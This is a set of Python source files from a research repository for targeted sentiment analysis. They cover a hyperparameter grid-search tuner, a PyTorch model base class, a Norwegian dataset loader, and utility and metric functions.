train_data (iterator): training dataset.
eval_data (iterator): dev dataset.
Examples::
>>> from sentarget.tuner import Tuner
>>> from sentarget.nn.models.lstm import BiLSTM
>>> from sentarget.nn.models.gru import BiGRU
>>> # Hyper parameters to tune
>>> tuner = Tuner(
... params_hyper={
... 'epochs': [2, 3],
... 'lr': [0.01],
... 'vectors': 'model.txt'
... }
... params_model={
... 'model': [BiLSTM],
... }
... params_loss={
... 'criterion': [torch.nn.CrossEntropyLoss],
... 'ignore_index': 0
... }
... params_optim={
... 'optimizer': [torch.optim.Adam]
... }
... )
>>> # train_iterator = torchtext data iterato
>>> tuner.fit(train_iterator, valid_iterator)
"""
# Update the options dictionary
self.options = {**self.options, **kwargs}
dirsaves = self.options['dirsaves']
saves = self.options['saves']
compare_on = self.options['compare_on']
verbose = self.options['verbose']
# All combinations of parameters, for the grid search
configs_hyper = permutation_dict(self.params_hyper)
configs_model = permutation_dict(self.params_model)
configs_loss = permutation_dict(self.params_loss)
configs_optim = permutation_dict(self.params_optim)
self._log = self.log_init(len(configs_hyper), len(configs_model), len(configs_loss), len(configs_optim))
if verbose:
print(self._log)
num_search = 0
for config_hyper in configs_hyper:
for config_model in configs_model:
for config_loss in configs_loss:
for config_optim in configs_optim:
num_search += 1
# Set a batch size to the data
train_data.batch_size = config_hyper['batch_size']
eval_data.batch_size = config_hyper['batch_size']
# Initialize the model from arguments that are in config_model, and tune it if necessary
model = init_cls(config_model['model'], config_model)
tune(model, config_model)
modelname = model.__class__.__name__
# Load the criterion and optimizer, with their parameters
criterion = init_cls(config_loss['criterion'], config_loss)
optimizer = init_cls(config_optim['optimizer'], {'params': model.parameters(), **config_optim})
tune_optimizer(optimizer, config_hyper)
# Update the configuration log
self._log_conf = f"Search n°{num_search}: {modelname}\n"
self._log_conf += self.log_conf(config_hyper=config_hyper,
config_model=config_model,
config_loss=config_loss,
config_optim=config_optim)
self._log_conf += f"\n{model.__repr__()}"
self._log += f"\n\n{self._log_conf}"
if verbose:
print(f"\n{self._log_conf}")
# Train the model
best_model = model.fit(train_data, eval_data,
criterion=criterion,
optimizer=optimizer,
epochs=config_hyper['epochs'],
verbose=False,
compare_on=compare_on)
results = {
'performance': model.performance,
'hyper': config_hyper,
'model': config_model,
'optimizer': self.params_optim,
'criterion': self.params_loss
}
self.results.append(serialize_dict(results))
# Update the current best model
if (self.best_model is None or
best_model.performance['eval'][compare_on] > self.best_model.performance['eval'][compare_on]):
self.best_model = copy.deepcopy(best_model)
# Update the current performance log
self._log_perf = model.log_perf()
self._log += "\n" + self._log_perf
if verbose:
print(self._log_perf)
# Save the current checkpoint
if saves:
dirname = os.path.join(dirsaves, 'gridsearch', f"search_{num_search}")
filename = f"model_{modelname}.pt"
model.save(filename=os.path.join(dirname, filename), checkpoint=False)
filename = f"best_{modelname}.pt"
best_model.save(filename=os.path.join(dirname, filename), checkpoint=True)
# Save the associated log
self._save_current_results(os.path.join(dirname, 'results.json'))
self._save_current_log(os.path.join(dirname, 'log.txt'))
if saves:
self.save(dirsaves=dirsaves)
def log_init(self, hyper, model, loss, optim):
"""Generate a general configuration log.
Args:
hyper (int): number of hyper parameters permutations.
model (int): number of model parameters permutations.
loss (int): number of loss parameters permutations.
optim (int): number of optimizer parameters permutations.
Returns:
string: general log.
"""
log = "GridSearch(\n"
log += f" (options): Parameters({describe_dict(self.options, )})\n"
log += f" (session): Permutations(hyper={hyper}, model={model}, loss={loss}, optim={optim}, total={hyper * model * loss * optim})\n"
log += ")"
return log
def log_conf(self, config_hyper={}, config_model={}, config_loss={}, config_optim={}, **kwargs):
"""Generate a configuration log from the generated set of configurations files.
Args:
config_hyper (dict): hyper parameters configuration file.
config_model (dict): model parameters configuration file.
config_loss (dict): loss parameters configuration file.
config_optim (dict): optimizer parameters configuration file.
Returns:
string: configuration file representation.
"""
log = f"Configuration(\n"
log += f" (hyper): Variables({describe_dict(config_hyper, **kwargs)})\n"
log += f" (model): Parameters({describe_dict(config_model, **kwargs)})\n"
log += f" (criterion): {config_loss['criterion'].__name__}({describe_dict(config_loss, **kwargs)})\n"
log += f" (optimizer): {config_optim['optimizer'].__name__}({describe_dict(config_optim, **kwargs)})\n"
log += ')'
return log
def _save_current_results(self, filename='results.json'):
# Create the directory if it does not exists
dirname = os.path.dirname(filename)
Path(dirname).mkdir(parents=True, exist_ok=True)
with open(filename, 'w') as outfile:
json.dump(serialize_dict(self.results[-1]), outfile)
def _save_current_log(self, filename='log.txt'):
# Create the directory if it does not exists
dirname = os.path.dirname(filename)
Path(dirname).mkdir(parents=True, exist_ok=True)
with open(filename, 'w') as outfile:
outfile.write(self._log_conf + "\n" + self._log_perf)
def save_log(self, filename='log.txt'):
# Create the directory if it does not exists
dirname = os.path.dirname(filename)
Path(dirname).mkdir(parents=True, exist_ok=True)
with open(filename, 'w') as outfile:
outfile.write(self._log)
def save_results(self, filename='results.json'):
# Create the directory if it does not exists
dirname = os.path.dirname(filename)
Path(dirname).mkdir(parents=True, exist_ok=True)
data = {'results': self.results}
with open(filename, 'w') as outfile:
json.dump(data, outfile)
def save(self, dirsaves=None, checkpoint=True):
r"""Save the performances as a json file, by default.
Args:
dirsaves (string): name of saving directory.
checkpoint (bool): if ``True``, saves the best model's checkpoint.
"""
dirsaves = self.options['dirsaves'] if dirsaves is None else dirsaves
self.save_log(os.path.join(dirsaves, 'log_gridsearch.txt'))
self.save_results(os.path.join(dirsaves, 'results_gridsearch.json'))
# Saving the best model
filename = f"best_{self.best_model.__class__.__name__}.pt"
self.best_model.save(filename=os.path.join(dirsaves, filename), checkpoint=checkpoint)
# And its log / performances
self._save_current_results(os.path.join(dirsaves, 'best_results.json'))
self._save_current_log(os.path.join(dirsaves, 'best_log.txt'))
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,711 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/nn/models/model.py | r"""
Defines a model template.
A `Model` is really similar to the `Module` class, except that a `Model` has more inner methods,
used to train, evaluate and test a neural network.
The *API* is similar to sklearn or tensorflow.
.. code-block:: python
class Net(Model):
def __init__(self, *args):
super(Model, self).__init__()
# initialize your module as usual
def forward(*args):
# one forward step
pass
def run(train_iterator, criterion, optimizer):
# train one single time the network
pass
def evaluate(eval_iterator, criterion):
# evaluate one single time the network
pass
def predict(test_iterator):
# predict one single time the network
pass
# Run and train the model
model = Net()
model.fit(epochs, train_iterator, eval_iterator, criterion, optimizer)
"""
from abc import abstractmethod, ABC
import torch
import torch.nn as nn
import torch.optim as optim
# Data science
import os
from pathlib import Path
import time
import copy
from sentarget.utils import append2dict, describe_dict, stats_dict
class Model(nn.Module, ABC):
r"""
A `Model` is used to define a neural network.
This template is easier to handle for hyperparameters optimization, as the ``fit``, ``train``, ``evaluate``
methods are part of the model.
* :attr:`checkpoint` (dict): checkpoint of the best model tested.
* :attr:`criterion` (Loss): loss function.
* :attr:`optimizer` (Optimizer): optimizer for weights and biases.
* :attr:`performance` (dict): dictionary where performances are stored.
* ``'train'`` (dict): training dictionary.
* ``'eval'`` (dict): testing dictionary.
"""
def __init__(self):
super().__init__()
# Performances
self.checkpoint = None
self.performance = None
self.reset()
@abstractmethod
def forward(self, *inputs, **kwargs):
raise NotImplementedError
def reset(self):
"""Reset the performance and associated checkpoint dictionary."""
self.checkpoint = {
'epoch': None,
'model_name': None,
'model_state_dict': None,
'optimizer_name': None,
'criterion_name': None,
'optimizer_state_dict': None,
'train': None,
'eval': None
}
self.performance = {
"train": {},
"eval": {}
}
@abstractmethod
def run(self, iterator, criterion, optimizer, *args, **kwargs):
r"""Train one time the model on iterator data.
Args:
iterator (Iterator): iterator containing batch samples of data.
criterion (Loss): loss function to measure scores.
optimizer (Optimizer): optimizer used during training to update weights.
Returns:
dict: the performance and metrics of the training session.
"""
raise NotImplementedError
@abstractmethod
def evaluate(self, iterator, criterion, *args, **kwargs):
r"""Evaluate one time the model on iterator data.
Args:
iterator (Iterator): iterator containing batch samples of data.
criterion (Loss): loss function to measure scores.
Returns:
dict: the performance and metrics of the training session.
"""
raise NotImplementedError
def predict(self, iterator, *args, **kwargs):
r"""Predict the model on iterator data.
Args:
iterator (Iterator): iterator containing batch samples of data.
Returns:
dict: the performance and metrics of the training session.
"""
raise NotImplementedError
def _update_checkpoint(self, epoch, criterion, optimizer, results_train=None, results_eval=None):
r"""Update the model's checkpoint. Keep track of its epoch, state, optimizer,
and performances. In addition, it saves the current model in `best_model`.
Args:
epoch (int): epoch at the current training state.
criterion (Loss): loss function to measure scores.
optimizer (Optimizer): optimizer used during training to update weights.
results_train (dict, optional): metrics for the training session at epoch. The default is ``None``.
results_eval (dict, optional): metrics for the evaluation session at epoch. The default is ``None``.
"""
self.checkpoint = {
'epoch': epoch,
'model_name': self.__class__.__name__,
'model_state_dict': copy.deepcopy(self.state_dict()),
'optimizer_name': optimizer.__class__.__name__,
'criterion_name': criterion.__class__.__name__,
'train': results_train,
'eval': results_eval
}
def fit(self, train_iterator, eval_iterator,
criterion=None, optimizer=None, epochs=10, verbose=True, compare_on='accuracy', **kwargs):
r"""Train and evaluate a model X times. During the training, both training
and evaluation results are saved under the `performance` attribute.
Args:
train_iterator (Iterator): iterator containing batch samples of data.
eval_iterator (Iterator): iterator containing batch samples of data.
epochs (int): number of times the model will be trained.
criterion (Loss): loss function to measure scores.
optimizer (Optimizer): optimizer used during training to update weights.
verbose (bool, optional): if ``True`` display a progress bar and metrics at each epoch.
compare_on (string): name of the score on which models are compared.
Returns:
Model: the best model evaluated.
Examples::
>>> model = MyModel()
>>> # Train & eval EPOCHS times
>>> criterion = nn.CrossEntropyLoss()
>>> optimizer = metrics.Adam(model.parameters())
>>> EPOCHS = 10
>>> model.fit(train_iterator, eval_iterator, epochs=EPOCHS, criterion=criterion, optimizer=optimizer)
Epoch: 1/10
Training: 100% | [==================================================]
Evaluation: 100% | [==================================================]
Stats Training: | Loss: 0.349 | Acc: 84.33% | Prec.: 84.26%
Stats Evaluation: | Loss: 0.627 | Acc: 72.04% | Prec.: 72.22%
>>> # ...
"""
self.reset()
# Keep track of the best model
best_model = None
best_eval_score = 0
start_time = time.time()
# Default update rules
criterion = nn.CrossEntropyLoss() if criterion is None else criterion
optimizer = optim.Adam(self.parameters()) if optimizer is None else optimizer
# Train and evaluate the model epochs times
for epoch in range(epochs):
if verbose:
print(f"Epoch:\t{epoch + 1:3d}/{epochs}")
# Train and evaluate the model
results_train = self.run(train_iterator, criterion, optimizer, **{**kwargs, 'verbose': verbose})
results_eval = self.evaluate(eval_iterator, criterion, **{**kwargs, 'verbose': verbose})
# Update the eval dictionary by adding the results at the current epoch
append2dict(self.performance["train"], results_train)
append2dict(self.performance["eval"], results_eval)
if verbose:
print("\t Stats Train: | " + describe_dict(results_train, pad=True, capitalize=True, sep_val=': ', sep_key=' | '))
print("\t Stats Eval: | " + describe_dict(results_eval, pad=True, capitalize=True, sep_val=': ', sep_key=' | '))
print()
# We copy in memory the best model
if best_eval_score < self.performance["eval"][compare_on][-1]:
best_eval_score = self.performance["eval"][compare_on][-1]
self._update_checkpoint(epoch + 1, criterion, optimizer, results_train=results_train, results_eval=results_eval)
best_model = copy.deepcopy(self)
self.performance['time'] = time.time() - start_time
return best_model
def describe_performance(self, *args, **kwargs):
"""Get a display of the last performance for both train and eval.
Returns:
tuple: two strings showing statistics for train and eval sessions.
"""
dict_train = {key: performance[-1] for (key, performance) in self.performance['train'].items()}
dict_eval = {key: performance[-1] for (key, performance) in self.performance['eval'].items()}
return describe_dict(dict_train, *args, **kwargs), describe_dict(dict_eval, *args, **kwargs)
def state_json(self):
r"""Return a serialized ``state_dict``, so it can be saved as a ``json``.
Returns:
dict
"""
state = {key: value.tolist() for (key, value) in self.state_dict().items()}
return state
def log_perf(self, **kwargs):
"""Get a log from the performances."""
describe_train, describe_eval = self.describe_performance(pad=True, **kwargs)
stats_train = stats_dict(self.performance['train'])
stats_eval = stats_dict(self.performance['eval'])
log = f"Performances(\n"
log += f" (train): Scores({describe_train})\n"
log += f" (eval): Scores({describe_eval})\n"
for (key_train, stat_train), (key_eval, stat_eval) in zip(stats_train.items(), stats_eval.items()):
log += f" (train): {str(key_train).capitalize()}({describe_dict(stat_train, pad=True, **kwargs)})\n"
log += f" (eval) {str(key_eval).capitalize()}({describe_dict(stat_eval, pad=True, **kwargs)})\n"
log += ')'
return log
def save(self, filename='model.pt', checkpoint=True):
r"""Save the best torch model.
Args:
filename (string, optional): name of the file.
checkpoint (bool, optional): True to save the model at the best checkpoint during training.
"""
# Create the directory if it does not exists
dirname = os.path.dirname(filename)
Path(dirname).mkdir(parents=True, exist_ok=True)
torch.save(self, filename)
# Save its checkpoint
if checkpoint:
epoch = self.checkpoint['epoch']
basename = os.path.basename(filename)
name = basename.split('.')[0]
checkname = f"checkpoint_{name}_epoch{epoch}.pt"
torch.save(self.checkpoint, os.path.join(dirname, checkname)) | {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,712 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/datasets/norecfine.py | """
The ``NoReCfine`` class defines the latest datasets used for targeted sentiment analysis.
.. code-block:: python
# First, download the training / dev / test data
train_data, dev_data, test_data = NoReCfine.splits(train_data="path_to_train",
dev_data="path_to_eval",
test_data="path_to_test")
"""
from torchtext.datasets import SequenceTaggingDataset
class NoReCfine(SequenceTaggingDataset):
r"""This class defines the ``NoReCfine`` datasets,
used on the paper *A Fine-grained Sentiment Dataset for Norwegian.*
"""
@classmethod
def splits(cls, fields, train_data="data/train.conll", dev_data="data/dev.conll", test_data="data/test.conll"):
return NoReCfine(train_data, fields), NoReCfine(dev_data, fields), NoReCfine(test_data, fields)
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,713 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/utils/functions.py | """
Utility functions.
"""
import functools
import itertools
import torch
def append2dict(main_dict, *dicts):
"""
Append key values to another dict with the same keys.
Args:
main_dict (dict): dictionary where values will be added.
*dicts (dict): dictionaries to extract values and append to another one.
These dictionaries should have the same keys as dict.
Examples::
>>> dict1 = {"key1": [], "key2": []}
>>> dict2 = {"key1": 0, "key2": 1}
>>> append2dict(dict1, dict2)
>>> dict1
{"key1": [0], "key2": [1]}
>>> dict3 = {"key1": 2, "key2": 3}
>>> dict4 = {"key1": 4, "key2": 5}
>>> append2dict(dict1, dict3, dict4)
>>> dict1
{"key1": [0, 2, 4], "key2": [1, 3, 5]}
"""
# Multiples dictionaries to merge
for d in dicts:
for (key, value) in d.items():
# Test if the dictionary to append have the key
try:
main_dict[key].append(value)
# If not, create the key and merge the value
except:
main_dict[key] = [value]
def permutation_dict(params):
r"""Generate a list of configuration files used to tune a model.
Returns:
list
Examples::
>>> hyper_params = {'dropout': [0, 0.1, 0.2, 0.3],
... 'in_features': [10, 20, 30, 40],
... 'out_features': [20, 30, 40, 50]}
>>> permutation_dict(hyper_params)
[{'dropout': 0, 'in_features': 10, 'out_features': 20},
{'dropout': 0, 'in_features': 10, 'out_features': 30},
{'dropout': 0, 'in_features': 10, 'out_features': 40},
{'dropout': 0, 'in_features': 10, 'out_features': 50},
{'dropout': 0, 'in_features': 20, 'out_features': 20},
{'dropout': 0, 'in_features': 20, 'out_features': 30},
...
]
"""
params_list = {key: value for (key, value) in params.items() if isinstance(value, list)}
params_single = {key: value for (key, value) in params.items() if not isinstance(value, list)}
keys, values = zip(*params_list.items())
permutations = [dict(zip(keys, v), **params_single) for v in itertools.product(*values)]
return permutations
def serialize_dict(data):
r"""Serialize recursively a dict to another dict composed of basic python object (list, dict, int, float, str...)
Args:
data (dict): dict to serialize
Returns:
dict
Examples::
>>> data = {'tensor': torch.tensor([0, 1, 2, 3, 4]),
... 'sub_tensor': [torch.tensor([1, 2, 3, 4, 5])],
... 'data': [1, 2, 3, 4, 5],
... 'num': 1}
>>> serialize_dict(data)
{'tensor': None,
'sub_tensor': [],
'data': [1, 2, 3, 4, 5],
'num': 1}
"""
new_data = {}
for (key, value) in data.items():
if isinstance(value, dict):
new_data[key] = serialize_dict(value)
elif isinstance(value, list):
new_data[key] = serialize_list(value)
elif isinstance(value, int) or isinstance(value, float) or isinstance(value, str) or isinstance(value, bool):
new_data[key] = value
else:
new_data[str(key)] = None
return new_data
def serialize_list(data):
"""Serialize recursively a list to another list composed of basic python object (list, dict, int, float, str...)
Args:
data (list): list to serialize
Returns:
list
Examples::
>>> data = [1, 2, 3, 4]
>>> serialize_list(data)
[1, 2, 3, 4]
>>> data = [torch.tensor([1, 2, 3, 4])]
>>> serialize_list(data)
[]
>>> data = [1, 2, 3, 4, torch.tensor([1, 2, 3, 4])]
>>> serialize_list(data)
[1, 2, 3, 4]
"""
new_data = []
for value in data:
if isinstance(value, list):
new_data.append(serialize_list(value))
elif isinstance(value, dict):
new_data.append(serialize_dict(value))
elif isinstance(value, int) or isinstance(value, float) or isinstance(value, str) or isinstance(value, bool):
new_data.append(value)
else:
return []
return new_data
def rsetattr(obj, attr, val):
r"""Set an attribute recursively.
..note ::
Attributes should be split with a dot ``.``.
Args:
obj (object): object to set the attribute.
attr (string): path to the attribute.
val (value): value to set.
"""
pre, _, post = attr.rpartition('.')
return setattr(rgetattr(obj, pre) if pre else obj, post, val)
def rgetattr(obj, attr, *args):
r"""Get an attribute recursively.
Args:
obj (object): object to get the attribute.
attr (string): path to the attribute.
*args:
Returns:
attribute
"""
def _getattr(obj, attr):
return getattr(obj, attr, *args)
return functools.reduce(_getattr, [obj] + attr.split('.'))
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,714 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/datasets/_utils.py | r"""
Some utils functions used to download and extract files.
"""
import requests
import tarfile
import zipfile
import shutil
import os
from sentarget.utils import progress_bar
def download_from_url(url, save_path):
"""Download a file from an URL.
Args:
url (str): path to the URL.
save_path (str): path to the saving directory.
Returns:
None
"""
response = requests.get(url, stream=True)
total = response.headers.get('content-length')
with open(save_path, 'wb') as f:
if total is None:
f.write(response.content)
else:
downloaded = 0
total = int(total)
for data in response.iter_content(chunk_size=max(int(total / 1000), 1024 * 1024)):
downloaded += len(data)
f.write(data)
progress_bar(downloaded, total, prefix="Downloading...")
def extract_to_dir(filename, dirpath='.'):
r"""Extract a compressed file.
Args:
filename (string): name of the file to extract.
dirpath (string): path to the extraction folder.
Returns:
string: path to the extracted files.
"""
# Does not create folder twice with the same name
name, ext = os.path.splitext(filename)
# Extract
print(dirpath)
print("Extracting...", end="")
if tarfile.is_tarfile(filename):
tarfile.open(filename, 'r').extractall(dirpath)
elif zipfile.is_zipfile(filename):
zipfile.ZipFile(filename, 'r').extractall(dirpath)
elif ext == '.gz':
if not os.path.exists(dirpath):
os.mkdir(dirpath)
shutil.move(filename, os.path.join(dirpath, os.path.basename(filename)))
print(f" | NOTE: gzip files were not extracted, and moved to {dirpath}", end="")
# Return the path where the file was extracted
print(" | Done !")
return os.path.abspath(dirpath)
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,715 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/nn/models/__init__.py | from . import lstm
from .lstm import BiLSTM
from .gru import BiGRU
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,716 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/metrics/functional.py | r"""
Elementary functions used for statistical reports.
"""
import numpy as np
def true_positive(matrix):
r"""True positive values from a confusion matrix.
.. math::
TP(M) = \text{Diag}(M)
Args:
matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
Returns:
numpy.ndarray
"""
return np.diag(matrix)
def true_negative(matrix):
r"""True negatives values from a confusion matrix.
.. math::
TN(M) = \sum_{i=0}^{C-1}{\sum_{j=0}^{C-1}{M_{i, j}}} - FN(M) + FP(M) + TP(M)
Args:
matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
Returns:
numpy.ndarray
"""
return np.sum(matrix) - (false_positive(matrix) + false_negative(matrix) + true_positive(matrix))
